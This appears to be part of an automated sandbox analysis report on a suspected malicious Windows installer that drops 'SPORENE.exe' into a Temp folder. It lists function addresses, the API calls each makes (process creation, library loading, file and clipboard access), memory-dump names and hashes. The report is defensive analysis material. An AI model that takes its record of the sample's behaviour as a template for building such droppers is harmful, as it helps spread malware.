Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-670666241
Opcode ID: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
Opcode Fuzzy Hash: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE, Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B20, Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
CloseHandle.KERNEL32(?), ref: 00405B56

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008, Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB, Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU,000000FF,UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4, Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,773123A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,773123A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403B12, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004056DE, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNEL32(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000002.00000002.213979764398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.213979741927.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979817683.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.213979847643.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979870671.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979895058.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979928144.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213979976030.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980009731.0000000000431000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980038882.0000000000440000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.213980070878.000000000044C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040498A, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\SPORENE.exe), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77313420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
